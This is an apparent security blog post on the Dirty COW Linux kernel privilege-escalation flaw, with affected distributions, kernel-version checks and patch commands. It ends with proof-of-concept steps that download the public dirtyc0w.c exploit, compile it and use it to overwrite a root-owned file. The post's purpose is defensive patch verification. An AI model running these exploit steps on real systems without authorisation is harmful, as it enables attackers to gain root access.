Overview
The dirty cow is a new high profile privilege escalation vulnerability in Linux. The latest in a series of branded bugs such as Heartbleed, Ghost and ShellShock. In this post I’ll give more details about this vulnerability and how to mitigate the risk of your systems.
Present in Linux kernel versions 2.6.22 and higher, the issue has existed since 2007. After a discovery by a security researcher named Phil Oester, it was fixed on Oct 18, 2016. Which means that there’s a high probability that your Linux running devices are vulnerable.
Description
The description from Redhat’s CVE:
“A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.”
First, an attacker gains access to the machine. Second, the attacker will run a publicly available exploit (several exist). A successful attack will result in the attacker gaining root privileges. This attack will not be logged, therefore will pass undetected.
Patches are available to most Linux distros.
Vulnerable Linux distros (Common):
Your first concern should be to mitigate the bug in your servers. Which probably have the most users and application packages. But you should also attend to network appliances and less common Linux distros such as CoreOS.
- Red Hat Enterprise Linux 7.x
- Red Hat Enterprise Linux 6.x
- Red Hat Enterprise Linux 5.x
- CentOS Linux 7.x
- CentOS Linux 6.x
- CentOS Linux 5.x
- Debian Linux wheezy
- Debian Linux jessie
- Debian Linux stretch
- Debian Linux sid
- Ubuntu Linux precise (LTS 12.04)
- Ubuntu Linux trusty
- Ubuntu Linux xenial (LTS 16.04)
- Ubuntu Linux yakkety
- Ubuntu Linux vivid/ubuntu-core
- SUSE Linux Enterprise 11 and 12.
- Amazon Linux AMI
Testing for a vulnerable kernel
Run the following command according to your distro:
$ uname -a
$ uname -mrs
Sample output:
Linux 3.13.0-95-generic x86_64
Fixing the issue
-Debian or Ubuntu Linux
$ sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade
$ sudo reboot
-RHEL / CentOS Linux 5.x/6.x/7.x
Red Hat is releasing the patches to the various versions gradually without supplying a deadline.|
For the updated info please refer to: https://access.redhat.com/security/vulnerabilities/2706661.
$ sudo yum update
$ sudo reboot
-Suse Enterprise Linux or OpenSuse Linux
To apply all needed patches to the system type:
# zypper patch
# reboot
-Amazon Linux AMI
The patched kernel’s version is: “kernel-4.4.23-31.54.amzn1.x86_64”.
To update the kernel:
# sudo yum update kernel
# reboot
Proof of Concept exploit
The POC will assist you to determine whether a less common Linux is vulnerable/patched:
- Download:
$ wget
https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
- Create a target file as root:
$ sudo -s
# echo this is not a test > foo
- Run the PoC as normal user:
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
M00000000000000000
Editors note:
I updated the post to include Amazon Linux AMI and the latest info from Red Hat.
References: